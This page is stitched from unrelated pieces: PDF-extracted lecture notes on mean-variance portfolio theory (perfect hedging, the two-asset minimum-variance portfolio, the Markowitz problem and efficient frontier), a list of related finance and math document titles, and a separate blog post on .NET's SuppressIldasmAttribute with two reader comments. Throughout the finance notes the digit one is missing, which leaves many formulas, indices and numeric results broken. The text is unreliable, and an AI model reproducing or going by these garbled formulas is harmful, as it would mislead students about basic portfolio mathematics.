3 Thus the risk tends to 0 as the number of assets n increases while the rate of return remains the same. In essence, as n increases, our portfolio becomes risk-free. Our example is important since it involves uncorrelated assets. But in fact by using correlated assets it is possible (theoretically) to reduce the variance to zero thus obtaining a risk-free investment! To see this, consider two assets (i =, 2). Suppose further that the total return R for asset is governed by some random event A ( weather is great for example) with P (A) = 0.5: If A occurs, then R = 2.5; if A does not occur then R = 0. Suppose that the total return for asset 2 is also governed by A but in the opposite way: If A occurs, then R 2 = 0; if A does not occur then R 2 = 2.5. In essence, asset 2 serves as insurance against the event A does not occur. Letting I{A} denote the indicator function for the event A (= if A occurs; 0 if not), we see that R = 2.5I{A} and R 2 = 2.5( I{A}). The rates of return can thus be expressed as r = 2.5I{A}, r 2 = 2.5( I{A}), and it is easily seen that σ 2 = σ2 2 = (.25)2. Choosing equal weights α = α 2 = 0.5, the rate of return becomes deterministic: ( ) r = 0.5r + 0.5r 2 = I{A} + 2.5( I{A}) = 0.5(2.5 2) = 0.5(0.5) = 0.25, w.p.. Thus σ 2 = V ar(r) = 0 for this portfolio, and we see that this investment is equivalent to placing your funds in a risk-free account at interest rate r = The key here is the negative correlation between r and r 2 : σ 2 = Cov(r, r 2 ) = (2.5) 2 Cov(I{A}, I{A}) = (2.5) 2 Cov(I{A}, I{A}) = (2.5) 2 V ar(i{a}) = (2.5) 2 P (A)( P (A)) = (.25) 2, yielding a correlation coefficient ρ = σ 2 /σ σ 2 = ; perfect negative correlation. This method of making the investment risk-free is an example of perfect hedging; asset 2 was used to perfectly hedge against the risk in asset. The above examples were meant for illustration only; assets are typically correlated in more complicated ways, as we know by watching stock prices fall all together at times. It thus is important to solve, for any given set of n assets (with given rates of return, variances and covariances), the weights corresponding to the minimum-variance portfolio. We start on this problem next..3 Minimal variance when n = 2 When n = 2 the weights can be described by one number α where α = α and α 2 = α. Because shorting is allowed, one of these weights might be negative. For example α =, α = 2 is possible if X 0 =, and X 02 = 2: short one dollar of asset and buy two dollars of asset 2. The performance of our portfolio can then be described by r = αr + ( α)r 2 (4) r = E(r) = αr + ( α)r 2 (5) f(α) = V ar(r) = α 2 σ 2 + ( α) 2 σ α( α)σ 2. (6) 3
4 denoting the (random) rate of return, expected rate of return, and variance of return respectively, when using weights α and α. Defining the correlation coefficient ρ between r and r 2 via we can rewrite ρ = σ 2 σ σ 2, σ 2 = ρσ σ 2, and ρ. The variance of the portfolio can thus be re-written as f(α) = α 2 σ 2 + ( α) 2 σ α( α)ρσ σ 2. (7) Our objective now is to find the value of α (denote this by α ) yielding the minimum variance. This would tell us what proportions of the two assets to use (for any amount X 0 > 0 invested) to ensure the smallest risk. The portfolio (α, α ) is called the minimum-variance portfolio. Our method is to solve f (α) = 0. Details are left to the reader who will carry out most of the analysis in a Homework Set 3. We assume here that both assets are risky, by which we mean that σ 2 > 0 and σ2 2 > 0. Theorem. If both assets are risky (and the case σ 2 = σ2 2 with ρ = is not included)2 then f (α) = 0 has a unique solution α and since f (α) > 0 for all α, f(α) is a strictly convex function and hence the solution α is the unique global minimum. This minimum and the corresponding mimimum value f(α ) are given by the formulas α = σ 2 = f(α ) = σ 2 2 ρσ σ 2 σ 2 + σ2 2 2ρσ σ 2, (8) σ 2 σ2 2 ( ρ2 ) σ 2 + σ2 2 2ρσ σ 2. (9) It follows that shorting is required for asset if and only if ρ > σ 2 /σ, whereas shorting is required for asset 2 if and only if ρ > σ /σ 2. (Both of these cases require positive correlation.) Corollary. If both assets are risky, then the variance for the minimal-variance portfolio is strictly smaller than either of the individual asset variances, σ 2 < min{σ 2, σ2 2 }, unless ρ = min{σ, σ 2 } max{σ, σ 2 }, in which case σ 2 = min{σ 2, σ2 2 }. (This includes the case σ2 = σ2 2 and ρ =.) In particular, σ 2 < min{σ 2, σ2 2 } whenever ρ < 0. Corollary.2 If both assets are risky, then. if ρ = 0 (uncorrelated case), then α = σ 2 = f(α ) = σ 2 2 σ 2 +, (0) σ2 2 σ 2 σ2 2 σ 2 +. () σ2 2 2 If σ 2 = σ 2 2 and ρ =, then f(α) = σ 2 = σ 2 2, for all α, and thus all portfolios have the same variance; there is no unique mimimum-variance portfolio. 4
5 2. if ρ = (perfect negative correlation), then the minimum variance portfolio is risk-free, σ 2 = f(α ) = 0, with deterministic rate of return given by (w.p..) r = r = σ2 2 + σ σ 2 σ 2 σ 2 + σ σ r + + σ σ 2 σ 2 σ 2 + σ σ r 2. σ 2 In this case no shorting is required: both α > 0 and α > if ρ = (perfect positive correlation) (and σ 2 σ2 2 ), then the minimum variance portfolio is risk-free, σ 2 = f(α ) = 0, with deterministic rate of return given by (w.p..) r = r = σ2 2 σ σ 2 (σ σ 2 ) 2 r + σ2 σ σ 2 (σ σ 2 ) 2 r 2. In this case shorting is required: α < 0 if σ > σ 2 ; α < 0 if σ < σ 2..4 Investing in two portfolios: treating a portfolio as an asset itself Suppose you can invest in two different portfolios, where each portfolio has its own rate of return (that you have no control over). The idea here is that each portfolio is itself an asset with its own shares that you can buy/sell and short. We have in mind here for example large mutual fund portfolios such as the ones offered by TIAA-CREFF, or Vangard. Your objective is to choose the weights invested in each so as to minimize the variance of the rate of return. By treating each portfolio as an asset, our problem falls exactly in the n = 2 framework of the previous section; we can apply Theorem.. As a specific example, let us consider the case when the first asset is a pure stock portfolio and the second a less risky portfolio containing some bonds. The stock portfolio will have a higher variance and a higher rate of return than the bond portfolio and the two will be somewhat positively correlated. If you are very risk averse, then you might consider investing all in the bond portfolio; but, you can do a bit better by diversifying among the two portfolios. Data could be found to estimate r, r 2, σ 2, σ2 2, ρ. Let us assume, for example, that r = 0.25 r 2 = 0.05 σ = 0.5 σ 2 = 0.05 ρ = 0.25 Plugging into formulas (8) and (9), we obtain α = , α = , σ = , and r = So the variance went down very slightly and (of course) at the expense of yielding an average rate of return to about that of the bond portfolio. Thus far in our study of portfolios, we have ignored our preference for a high average rate of return over a low one; we address this next..5 The Markowitz Problem Clearly, just as a rational investor wishes for a low variance on return, a high expected rate of return is also desired. For example, you can always keep variance down by investing in bonds over stocks, but you do so at the expense of a decent rate of return. Thus an investor s optimal 5
6 portfolio could be best described by performing as (r, σ), where r is a desired (and feasible) average rate of return, and σ 2 the minimal variance possible for this given r. (Put differently, an investor might wish to find the highest rate of return possible for a given acceptable level of risk.) Thus it is of interest to compute the weights corresponding to such an optimal portfolio. This problem and its solution is originally due to Harry Markowitz in the 950 s. 3 Using the notation from Section. for portfolios of n risky assets (and allowing for shorting) we want to find the solution to: minimize subject to αi 2 σ 2 i + 2 α i α j σ ij i<j n α i r i = r α i =. Here, r is a fixed pre-desired level for expected rate of return, and a solution is any portfolio (α, α 2,..., α n ) that minimizes the objective function (variance) and offers expected rate r. This is an example of what is called a quadratic program, an optimization problem with a quadratic objective function, and linear constraints. Fortunately, our particular quadratic program can be reduced to a problem of merely solving linear equations, as we will see next. Since the objective function is non-negative, it can be multiplied by any non-negative constant without changing the solution. Moreover, we can simplify notation by using the fact that σ ii = σi 2. The following equivalent formulation is the most common in the literature: minimize subject to 2 α i α j σ ij (2) α i r i = r (3) α i =. (4) The solution is obtained by using the standard technique from calculus of introducing two more variables called Lagrange multipliers, λ and µ (one for each subject to constraint), and forming the Lagrangian Setting L α i L = 2 ( n ) α i α j σ ij λ α i r i r µ ( n = 0 for each of the n weight variables α i yields n equations; α j σ ij λr i µ = 0, i {, 2,..., n}. j= ) α i. (5) 3 Markowitz is one of three economists who won the Nobel Prize in Economics in 990.The others are Merton Miller and William Sharpe. 6
7 Each such equation is linear in the n + 2 variables (α, α 2,..., α n, λ, µ) and together with the remaining two subject to linear constraints, yields a set of n + 2 linear equations with n + 2 unknowns. Thus a solution to the Markowitz problem is found by finding a solution (α, α 2,..., α n, λ, µ) to the set of n + 2 linear equations, α j σ ij λr i µ = 0, i {, 2,..., n} (6) j= α i r i = r α i =, and using the weights (α, α 2,..., α n ) as the solution. In the end, the problem falls into the standard framework of linear algebra, and amounts to computing the inverse of a matrix: solve Ax = b; solution x = A b. The student will have had much practice of such methods in Linear Programming (LP) from Operations Research. There are various software packages for dealing with such computations. We point out in passing that the Markowitz problem will of course only have a solution for values of r that are feasible, that is, can be achieved via α i r i = r, from some portfolio (α, α 2,..., α n ). Over all, we are considering the set of all feasible pairs (r, σ); those pairs for which there exists a portfolio (α, α 2,..., α n ) such that and α i r i = r, α i α j σ ij = σ 2. The set of all feasible pairs is a subset of the two-dimensional σ r plane, and is called the feasible set. For each fixed feasible r the Markowitz problem yields that feasible pair (r, σ) with the smallest σ. As we vary r to obtain all such pairs, we obtain what is called the minimumvariance set, a subset of the feasible set. In general σ will increase as you increase your desired level of expected return r..6 Finding the minimum-variance portfolio If we look at the set of all pairs (r, σ) in the minimum-variance set, we could find one with the smallest σ, that is, corresponding to the so-called minimum-variance portfolio that we considered in earlier sections. This pair denoted by (r, σ ) is called the minimum-variance point. 7
8 We can modify the Markowitz problem to find the minimum-variance portfolio as follows: If we leave out our requirement that the expected rate of return be equal to a given level r, then the Markowitz problem becomes minimize subject to 2 α i α j σ ij (7) α i =, (8) and its solution yields the minimum-variance portfolio for n risky assets. Lagrangian methods once again can be employed where now we need only introduce one new variable µ, L = ( n ) α i α j σ ij µ α i, (9) 2 and the solution reduces to solving n + equations with n + unknowns:.7 Efficient Frontier α j σ ij µ = 0, i {, 2,..., n} (20) j= α i =. (2) Suppose (r, σ ) is the minimum variance point. Then we can go ahead and graph all pairs (r, σ) in the minimum-variance set satisfying r r. This set of pairs is called the efficient frontier and corresponds to what are called efficient portfolios. As r increases, σ increases also: A higher rate of return involves higher risk. The efficient frontier traces out a nice increasing curve in the σ r plane; see Figure 6. of the Text, Page 57. We view the efficient frontier as corresponding to those portfolios considered by a rational investor. When shorting is allowed, and there are at least two distinct values for r i (e.g., not all are the same), then the efficient frontier is unbounded from above: You can obtain as high a expected return as is desirable. (The problem, however, is that you do so with increasing risk that tends to.) To see that it is unbounded: Select any two of the assets (say, 2) with different rates of return. Assume that r > r 2. Invest only in these two yielding r = αr + ( α)r 2 = α(r r 2 ) + r 2. As α so does r; any high rate is achievable no matter how large. Notice that to do this though, ( α) becomes negative and large; we must short increasing amounts of asset 2..8 Generating the efficient frontier from only two portfolios Let w = (α, α 2,..., α n, λ, µ ) be a solution to the Markowitz problem for a given expected rate of return r, and w 2 = (α 2, α2 2,..., α2 n, λ 2, µ 2 ) be a solution to the Markowitz problem for a different given expected rate of return r 2. From the linearity of the solution, it is immediate 8
9 (reader should verify) that for any number α, the new point αw + ( α)w 2 is itself a solution to the Markowitz problem for expected rate of return αr + ( α)r 2. Here, αw = (αα, αα 2,..., αα n, αλ, αµ ) ( α)w 2 = (( α)α 2, ( α)α 2 2,..., ( α)α 2 n, ( α)λ 2, ( α)µ 2 ), and thus αw + ( α)w 2 is of the form (α, α 2,..., α n, λ, µ) with α i = αα i + ( α)α2 i, λ = αλ + ( α)λ 2, and µ = αµ + ( α)µ 2. This new point (α, α 2,..., α n, λ, µ) is a solution to the n+2 linear equations following (6) for r = αr + ( α)r 2. We conclude that knowing two distinct solutions allows us to generate a whole collection of new solutions, and hence a whole bunch of points on the efficient frontier. It turns out that the entire minimum-variance set can be generated from two such distinct solutions. In particular, one can generate the entire efficient frontier from any two distinct solutions. Treating each of the two fixed distinct solutions as portfolios and hence as assets in their own right, we conclude that we can obtain any desired investment performance by investing in these two assets only. The idea is to think of each of these two assets as mutual funds as in Section.4, and create your investment by investing in these two funds only; we are back to the n = 2 case. If we imagine the entire asset marketplace as our potential investment opportunity, then we conclude that it suffices to only invest in two distinct (and excellent) mutual funds, in the sense that we can obtain any point on the efficient frontier by doing so..9 Ruling out shorting The Markowitz problem assumed shorting was allowed, but if shorting is not allowed, then the additional n constraints, α i 0, i {, 2,..., n}, must be included as part of the subject to. This complicates matters because now, instead of only equalities, there are inequalities in the constraints; the solution to this quadratic program is no longer obtained by simply inverting a matrix. But the problem can be handled by using the methods of LP, where n additional Lagrange multipliers must be utilized, and the problem becomes one of finding a feasible region for a LP. This problem will be discussed later. 9
2. Mean-variance portfolio theory
2. Mean-variance portfolio theory (2.1) Markowitz s mean-variance formulation (2.2) Two-fund theorem (2.3) Inclusion of the riskfree asset 1 2.1 Markowitz mean-variance formulation Suppose there are N
1 Capital Asset Pricing Model (CAPM)
Copyright c 2005 by Karl Sigman 1 Capital Asset Pricing Model (CAPM) We now assume an idealized framework for an open market place, where all the risky assets refer to (say) all the tradeable stocks available
Chapter 2 Portfolio Management and the Capital Asset Pricing Model
Chapter 2 Portfolio Management and the Capital Asset Pricing Model In this chapter, we explore the issue of risk management in a portfolio of assets. The main issue is how to balance a portfolio, that
Mean-Variance Portfolio Analysis and the Capital Asset Pricing Model
Mean-Variance Portfolio Analysis and the Capital Asset Pricing Model 1 Introduction In this handout we develop a model that can be used to determine how a risk-averse investor can choose an optimal asset
Lecture 1: Asset Allocation
Lecture 1: Asset Allocation Investments FIN460-Papanikolaou Asset Allocation I 1/ 62 Overview 1. Introduction 2. Investor s Risk Tolerance 3. Allocating Capital Between a Risky and riskless asset 4. Allocating
Portfolio Optimization Part 1 Unconstrained Portfolios
Portfolio Optimization Part 1 Unconstrained Portfolios John Norstad j-norstad@northwestern.edu September 11, 2002 Updated: November 3, 2011 Abstract We recapitulate the single-period
15.401 Finance Theory
Finance Theory MIT Sloan MBA Program Andrew W. Lo Harris & Harris Group Professor, MIT Sloan School Lecture 13 14 14: : Risk Analytics and Critical Concepts Motivation Measuring Risk and Reward Mean-Variance
CHAPTER 7: OPTIMAL RISKY PORTFOLIOS
CHAPTER 7: OPTIMAL RIKY PORTFOLIO PROLEM ET 1. (a) and (e).. (a) and (c). After real estate is added to the portfolio, there are four asset classes in the portfolio: stocks, bonds, cash and real estate.
FE670 Algorithmic Trading Strategies. Stevens Institute of Technology
FE670 Algorithmic Trading Strategies Lecture 6. Portfolio Optimization: Basic Theory and Practice Steve Yang Stevens Institute of Technology 10/03/2013 Outline 1 Mean-Variance Analysis: Overview 2 Classical }
Portfolio Analysis. M. Kateregga
Portfolio Analysis M. Kateregga November 21, 2014 @ AIMS South Africa Outline Introduction The Optimization Problem Return of a Portfolio Variance of a Portfolio Portfolio Optimization in n-stocks case
Mean Variance Analysis
Mean Variance Analysis Karl B. Diether Fisher College of Business Karl B. Diether (Fisher College of Business) Mean Variance Analysis 1 / 36 A Portfolio of Three Risky Assets Not a two risky asset world 6 RISK AND RISK AVERSION
CHAPTER 6 RISK AND RISK AVERSION RISK AND RISK AVERSION Risk with Simple Prospects Risk, Speculation, and Gambling Risk Aversion and Utility Values Risk with Simple Prospects The presence of risk means
1 Capital Allocation Between a Risky Portfolio and a Risk-Free Asset
Department of Economics Financial Economics University of California, Berkeley Economics 136 November 9, 2003 Fall 2006 Economics 136: Financial Economics Section Notes for Week 11 1 Capital Allocation
1 Interest rates, and risk-free investments
Interest rates, and risk-free investments Copyright c 2005 by Karl Sigman. Interest and compounded interest Suppose that you place x 0 ($) in an account that offers a fixed (never to change over time)
Review for Exam 2. Instructions: Please read carefully
Review for Exam 2 Instructions: Please read carefully The exam will have 25 multiple choice questions and 5 work problems You are not responsible for any topics that are not covered in the lecture
On the Efficiency of Competitive Stock Markets Where Traders Have Diverse Information
Finance 400 A. Penati - G. Pennacchi Notes on On the Efficiency of Competitive Stock Markets Where Traders Have Diverse Information by Sanford Grossman This model shows how the heterogeneous information
Enhancing the Teaching of Statistics: Portfolio Theory, an Application of Statistics in Finance
Page 1 of 11 Enhancing the Teaching of Statistics: Portfolio Theory, an Application of Statistics in Finance Nicolas Christou University of California, Los Angeles Journal of Statistics Education Volume
Lecture 2: Equilibrium
Lecture 2: Equilibrium Investments FIN460-Papanikolaou Equilibrium 1/ 33 Overview 1. Introduction 2. Assumptions 3. The Market Portfolio 4. The Capital Market Line 5. The Security Market Line 6. Conclusions)
Lecture 6: Arbitrage Pricing Theory
Lecture 6: Arbitrage Pricing Theory Investments FIN460-Papanikolaou APT 1/ 48 Overview 1. Introduction 2. Multi-Factor Models 3. The Arbitrage Pricing Theory FIN460-Papanikolaou APT 2/ 48 Introduction
Midterm Exam:Answer Sheet
Econ 497 Barry W. Ickes Spring 2007 Midterm Exam:Answer Sheet 1. (25%) Consider a portfolio, c, comprised of a risk-free and risky asset, with returns given by r f and E(r p ), respectively. Let y be the
SAMPLE MID-TERM QUESTIONS
SAMPLE MID-TERM QUESTIONS William L. Silber HOW TO PREPARE FOR THE MID- TERM: 1. Study in a group 2. Review the concept questions in the Before and After book 3. When you review the questions listed below,
CAPM, Arbitrage, and Linear Factor Models
CAPM, Arbitrage, and Linear Factor Models CAPM, Arbitrage, Linear Factor Models 1/ 41 Introduction We now assume all investors actually choose mean-variance e cient portfolios. By equating these investors.
In this section, we will consider techniques for solving problems of this type.
Constrained optimisation roblems in economics typically involve maximising some quantity, such as utility or profit, subject to a constraint for example income. We shall therefore need techniques for solving
How to Win the Stock Market Game
How to Win the Stock Market Game 1 Developing Short-Term Stock Trading Strategies by Vladimir Daragan PART 1 Table of Contents 1. Introduction 2. Comparison of trading strategies 3. Return per trade 4.
A Log-Robust Optimization Approach to Portfolio Management
A Log-Robust Optimization Approach to Portfolio Management Dr. Aurélie Thiele Lehigh University Joint work with Ban Kawas Research partially supported by the National Science Foundation Grant CMMI-0757983
Answers to Concepts in Review
Answers to Concepts in Review 1. A portfolio is simply a collection of investments assembled to meet a common investment goal. An efficient portfolio is a portfolio offering the highest expected return
4: SINGLE-PERIOD MARKET MODELS
4: SINGLE-PERIOD MARKET MODELS Ben Goldys and Marek Rutkowski School of Mathematics and Statistics University of Sydney Semester 2, 2015 B. Goldys and M. Rutkowski (USydney) Slides 4: Single-Period Market
Basic Utility Theory for Portfolio Selection
Basic Utility Theory for Portfolio Selection In economics and finance, the most popular approach to the problem of choice under uncertainty is the expected utility (EU) hypothesis. The reason for this
A Log-Robust Optimization Approach to Portfolio Management
A Log-Robust Optimization Approach to Portfolio Management Ban Kawas Aurélie Thiele December 2007, revised August 2008, December 2008 Abstract We present a robust optimization approach to portfolio 05: Mean-Variance Analysis & Capital Asset Pricing Model (CAPM)
Lecture 05: Mean-Variance Analysis & Capital Asset Pricing Model (CAPM) Prof. Markus K. Brunnermeier Slide 05-1 Overview Simple CAPM with quadratic utility functions (derived from state-price beta model)
Lesson 5. Risky assets
Lesson 5. Risky assets Prof. Beatriz de Blas May 2006 5. Risky assets 2 Introduction How stock markets serve to allocate risk. Plan of the lesson: 8 >< >: 1. Risk and risk aversion 2. Portfolio risk 3.
Instructor s Manual Chapter 12 Page 144
Chapter 12 1. Suppose that your 58-year-old father works for the Ruffy Stuffed Toy Company and has contributed regularly to his company-matched savings plan for the past 15 years. Ruffy contributes $0.50
CHAPTER 6: RISK AVERSION AND CAPITAL ALLOCATION TO RISKY ASSETS
CHAPTER 6: RISK AVERSION AND CAPITAL ALLOCATION TO RISKY ASSETS PROBLEM SETS 1. (e). (b) A higher borrowing is a consequence of the risk of the borrowers default. In perfect markets with no additional
Random Vectors and the Variance Covariance Matrix
Random Vectors and the Variance Covariance Matrix Definition 1. A random vector X is a vector (X 1, X 2,..., X p ) of jointly distributed random variables. As is customary in linear algebra, we will write.
15.062 Data Mining: Algorithms and Applications Matrix Math Review
.6 Data Mining: Algorithms and Applications Matrix Math Review The purpose of this document is to give a brief review of selected linear algebra concepts that will be useful for the course and to develop
An Introduction to Portfolio Theory
An Introduction to Portfolio Theory John Norstad j-norstad@northwestern.edu April 10, 1999 Updated: November 3, 2011 Abstract We introduce the basic concepts of portfolio theory,.
Linear Programming Problems
Linear Programming Problems Linear programming problems come up in many applications. In a linear programming problem, we have a function, called the objective function, which depends linearly on a number
How to assess the risk of a large portfolio? How to estimate a large covariance matrix?
Chapter 3 Sparse Portfolio Allocation This chapter touches some practical aspects of portfolio allocation and risk assessment from a large pool of financial assets (e.g. stocks) How to assess the risk
CFA Examination PORTFOLIO MANAGEMENT Page 1 of 6
PORTFOLIO MANAGEMENT A. INTRODUCTION RETURN AS A RANDOM VARIABLE E(R) = the return around which the probability distribution is centered: the expected value or mean of the probability distribution of possible
CHAPTER 11: ARBITRAGE PRICING THEORY
CHAPTER 11: ARBITRAGE PRICING THEORY 1. The revised estimate of the expected rate of return on the stock would be the old estimate plus the sum of the products of the unexpected change in each factor times
Positive Weights on the Efficient Frontier
Positive Weights on the Efficient Frontier Phelim Boyle Wilfrid Laurier University August 2012 Acknowledgments This paper is dedicated to Boyle s Winter 2012 graduate finance class at Wilfrid Laurier
A New Interpretation of Information Rate
A New Interpretation of Information Rate reproduced with permission of AT&T By J. L. Kelly, jr. (Manuscript received March 2, 956) If the input symbols to a communication channel represent the outcomes
22.1. Markowitz Portfolio Theory
NPTEL Course Course Title: Security Analysis and Portfolio Management Course Coordinator: Dr. Jitendra Mahakud Module-11 Session-22 Markowitz Portfolio Theory 22.1. Markowitz Portfolio Theory The pioneering
FINANCIAL ECONOMICS OPTION PRICING
OPTION PRICING Options are contingency contracts that specify payoffs if stock prices reach specified levels. A call option is the right to buy a stock at a specified price, X, called the strike price..
Linear Programming I
Linear Programming I November 30, 2003 1 Introduction In the VCR/guns/nuclear bombs/napkins/star wars/professors/butter/mice problem, the benevolent dictator, Bigus Piguinus, of south Antarctica penguins
Problem Set 6 - Solutions
ECO573 Financial Economics Problem Set 6 - Solutions 1. Debt Restructuring CAPM. a Before refinancing the stoc the asset have the same beta: β a = β e = 1.2. After restructuring the company has the same
Stochastic Inventory Control
Chapter 3 Stochastic Inventory Control 1 In this chapter, we consider in much greater details certain dynamic inventory control problems of the type already encountered in section 1.3. In addition to Programming. March 14, 2014
Linear Programming March 1, 01 Parts of this introduction to linear programming were adapted from Chapter 9 of Introduction to Algorithms, Second Edition, by Cormen, Leiserson, Rivest and Stein [1]. 1
The Capital Asset Pricing Model
Finance 400 A. Penati - G. Pennacchi The Capital Asset Pricing Model Let us revisit the problem of an investor who maximizes expected utility that depends only on the expected return and variance (or standard
CORRELATED TO THE SOUTH CAROLINA COLLEGE AND CAREER-READY FOUNDATIONS IN ALGEBRA
We Can Early Learning Curriculum PreK Grades 8 12 INSIDE ALGEBRA, GRADES 8 12 CORRELATED TO THE SOUTH CAROLINA COLLEGE AND CAREER-READY FOUNDATIONS IN ALGEBRA April 2016 Mathematical
CHAPTER 15. Option Valuation
CHAPTER 15 Option Valuation Just what is an option worth? Actually, this is one of the more difficult questions in finance. Option valuation is an esoteric area of finance since it often involves complex
DATA ANALYSIS II. Matrix Algorithms
DATA ANALYSIS II Matrix Algorithms Similarity Matrix Given a dataset D = {x i }, i=1,..,n consisting of n points in R d, let A denote the n n symmetric similarity matrix between the points, given as,...,
Chapter 3 Joint Distributions
Chapter 3 Joint Distributions 3.6 Functions of Jointly Distributed Random Variables Discrete Random Variables: Let f(x, y) denote the joint pdf of random variables X and Y with A denoting the two-dimensional
Note: There are fewer problems in the actual Final Exam!
HEC Paris Practice Final Exam Questions Version with Solutions Financial Markets Fall 2013 Note: There are fewer problems in the actual Final Exam! Problem 1. Are the following statements True, False or
CAPITAL ASSET PRICES WITH AND WITHOUT NEGATIVE HOLDINGS
CAPITAL ASSET PRICES WITH AND WITHOUT NEGATIVE HOLDINGS Nobel Lecture, December 7, 1990 by WILLIAM F. SHARPE Stanford University Graduate School of Business, Stanford, California, USA INTRODUCTION* Following
SECTION 0.6: POLYNOMIAL, RATIONAL, AND ALGEBRAIC EXPRESSIONS
(Section 0.6: Polynomial, Rational, and Algebraic Expressions) 0.6.1 SECTION 0.6: POLYNOMIAL, RATIONAL, AND ALGEBRAIC EXPRESSIONS LEARNING OBJECTIVES Be able to identify polynomial, rational, and algebraic
24. The Branch and Bound Method
24. The Branch and Bound Method It has serious practical consequences if it is known that a combinatorial problem is NP-complete. Then one can conclude according to the present state of science that no
6 EXTENDING ALGEBRA. 6.0 Introduction. 6.1 The cubic equation. Objectives
6 EXTENDING ALGEBRA Chapter 6 Extending Algebra Objectives After studying this chapter you should understand techniques whereby equations of cubic degree and higher can be solved; be able to factorise 1 Course Title
Algebra 1 Course Title Course- wide 1. What patterns and methods are being used? Course- wide 1. Students will be adept at solving and graphing linear and quadratic equations 2. Students will be adept
Math Review. for the Quantitative Reasoning Measure of the GRE revised General Test
Math Review for the Quantitative Reasoning Measure of the GRE revised General Test Overview This Math Review will familiarize you with the mathematical skills and concepts that are important | http://docplayer.net/16312131-1-portfolio-mean-and-variance.html | CC-MAIN-2018-43 | refinedweb | 6,436 | 59.53 |
6 years, 3 months ago.
Arduino + Mbed i2c?
Hello.
I am currently working on a project that requires me to send data from the mbed to the arduino using i2c... Does anyone have an idea of how i can do this? This is what i have tried so far.
mbed master code
#include "mbed.h" Serial rn42(p9,p10); DigitalOut myled(LED1); I2C i2c (p28,p27); int x; int main() { rn42.baud(115200); while (1) { if (rn42.readable()) { x = rn42.getc(); printf("%d\n",x); myled = !myled; i2c.start(); i2c.write(0xC0); i2c.write(x); i2c.stop(); } } }
arduino slave code
#include <Wire.h> byte y; void setup() { Serial.begin(115200); Wire.begin(0xC0); } void loop() { Wire.onReceive(receiveEvent); } void receiveEvent(int howMany) { y = Wire.read(); Serial.println (y); }
Thank you very much.
2 Answers
1 year, 3 months ago.
Be aware that mBed i2c addresses are shifted 1 bit to the left. So if you use the I2C address 0x0F (00001111) on the arduino, it will be 0x1E (00011110) on mBed
3 years, 7 months ago.
I'm in the same boat. Arduino (Master) sending messages to mbed (slave or another master). Has this already been mastered?
To post an answer, please log in. | https://os.mbed.com/questions/755/Arduino-Mbed-i2c/ | CC-MAIN-2019-30 | refinedweb | 204 | 88.74 |
Few emits in one slot
Hello,
I don't understand one thing.I must use in aplication comunication with modbus and comparation of values in varables. In case of conditions "happens" events.For now I'm using thread for modbus comunication. Now I'm testing a drawt of main function.
My problem is : I would like to send at least two emits wchich runs functions on modbus thread. Additionally main function is cyclic called by timer (I want to have fast refersh of values from modbus)
Now part of code:
#include "mainwindow.h" #include "ui_mainwindow.h" #include "settings.h" #include <QStatusBar> #include <QDebug> #include<QString> #include <QSqlQueryModel> #include <QFile> #include <QThread> #include "modbus.h" MainWindow::MainWindow(QWidget *parent) :QMainWindow(parent), ui(new Ui::MainWindow) { ui->setupUi(this); timer_1=new QTimer(this); timer_1->setInterval(2000); //Threads QThread* thread = new QThread; modbus* Modbus = new modbus; Modbus->moveToThread(thread); connect(this, SIGNAL (cyl_1_FF()), Modbus, SLOT (Cylinder_1_FF())); connect(this, SIGNAL(Read_1()),Modbus, SLOT(Read_1_value())); thread->start(); connect(timer_1,SIGNAL(timeout()),this,SLOT(Test_mode_1())); } void MainWindow::Test_mode_1(){ //Main function emit Read_1(); emit cyl_1_FF(); }
Problem is that: when is only one "emit" it's working. When are two "emits" - no one works.
I've tried also connetion type" Qt::BlockingQueuedConnection" but also not works.
- SGaist Lifetime Qt Champion last edited by
Hi and welcome to devnet,
Before starting to add threading to your application, you should check whether the asynchronous nature of Qt is not already enough to manage the data coming from modbus.
Then why do you need to have two different functions called one after the other ? Are you sure it's the correct design ?
Hello,
Then why do you need to have two different functions called one after the other ? Are you sure it's the correct design ?
Hello,
This is an example for begin. Normally should be:
emit Read_1(); if( something) { emit cyl_1_FF(); //other code } else{ emit cyl_1_RW(); //other code }
I'm testing modbus communication using QSerialPort. I've heard when using separatelly thread that thread collect all "thinks to do" on stack and execute one by one. But I see that is not true. Those two signals are emited, but almost in the same time. This makes mess on QSerialPort. I must use some comunication switch.
- SGaist Lifetime Qt Champion last edited by
Well, your example shows that you seem to want to have a sequential blocking behaviour while using an asynchronous system. That doesn't seem right.
By the way, why not use the QSerialBus module which support modbus ?
@Narki1 said in Few emits in one slot:
no one works.
What does this means? it crashes? How are you debugging the problem? | https://forum.qt.io/topic/109570/few-emits-in-one-slot | CC-MAIN-2022-27 | refinedweb | 442 | 58.48 |
Long story short – you can use SuppressIldasmAttribute attribute. However, please note that it won’t prevent decompilers (such as .NET Reflector, ILSpy or JustDecompile) from reverse engineering your code.
Here are the details:
What is IL?
Intermediate Language (IL) is CPU-independent instructions and any managed (.NET) code is compiled into IL during compile time. This IL code then compiles into CPU-specific code during runtime, mostly by Just InTime (JIT) compiler.
What is ILDASM?
ILDASM is a tool installed by Visual Studio or .NET SDK and it takes a managed DLL or EXE and produces the IL code which is human readeble clear text.
How to get IL code from an assembly
For example, consider the following code:
using System;
using System.Text;
namespace HelloWorld
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("Hello world...");
}
}
}
Put this code in a console project and build it, you will have an EXE file.
Then open a Visual Studio Command Prompt and type ILDASM and press enter. ILDASM should be opened. Open the EXE file you build from the code above in the ILDASM. You should see something like below:
If you double click on Main : void(string[]) then you can get the IL code of the Main method:
So, how can I prevent ILDASM from disassembling an assembly?
.NET has an attribute called SuppressIldasmAttribute which prevents disassembling the code. For example, consider the following code:
using System;
using System.Text;
using System.Runtime.CompilerServices;
[assembly: SuppressIldasmAttribute()]
namespace HelloWorld
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("Hello world...");
}
}
}
As you can see, there are just two differences:
1) We have added System.Runtime.CompilerServices namespace decleration.
2) We have added [assembly: SuppressIldasmAttribute()] attribute.
After building the application in Visual Studio, when we try to open the resulting EXE file in ILDASM, now we get the following message:
Does SuppressIldasmAttribute prevents my code to be decompiled using decompilers?
No. Decompilers are using System.Reflection namespaces and classes to decompile the code and It is not possible to secure your code using that attribute. Your only option is to use obfuscators to scramble your code although scrambling will only produce code which is more difficult to read and understand.
References
MSIL Disassembler (Ildasm.exe)
SuppressIldasmAttribute Class
--
AMB
so what?! reflector, ida-pro and lots of others don't care about it!
don't waste your time.
anon, ida-pro and others know nothing about IL. So I think it worth some time at less to make some pain in the butt for hruckers 😉
